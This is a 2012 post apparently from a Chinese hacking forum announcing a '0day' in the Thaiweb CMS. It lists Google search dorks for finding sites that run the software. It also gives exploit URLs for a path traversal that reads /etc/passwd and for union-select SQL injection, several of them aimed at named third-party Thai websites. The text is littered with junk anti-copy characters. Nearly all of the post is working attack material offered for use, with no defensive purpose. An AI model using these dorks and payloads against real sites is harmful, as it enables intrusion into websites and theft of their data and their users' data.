找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2076|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:3 h& T' T* _+ D4 s& R* M
% v3 Q% }* `! ?
intext:powered by Thaiweb7 x. x! T, t1 X3 ~0 Q5 C7 \
  f6 w) p! D3 n4 b& c
inurl:index.php?page=board.php
1 Y# @% Z3 a9 t" |. I! ?
; s( h. _- G) y . P7 f0 O/ X, _  R( Z* j

9 E7 Y& D' `% p! A! g/ ]( }) V4 N利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
6 S! L+ E3 u: l, s
! Z- G8 N/ a3 v1 i
" @8 D0 O4 V7 [" F$ Y) M0 T- k. c8 s2 X3 y
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
  y% j, W* _% G+ ^% }' H6 o6 b* ^; E8 N( j$ m' I
, U; ]3 f' r! ?1 |. p. _

) C) F: T+ A2 L+ S! y+ q2 P, x  M7 Ehttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
$ P( t: A7 e) H
, ]$ Q! }2 M8 O, @( ghttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--) B2 _- S& I# M

% p9 K3 q3 Z2 ]7 A" h( Jhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
0 Q2 ~$ K, p( Z! K6 f" x8 c0 f
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表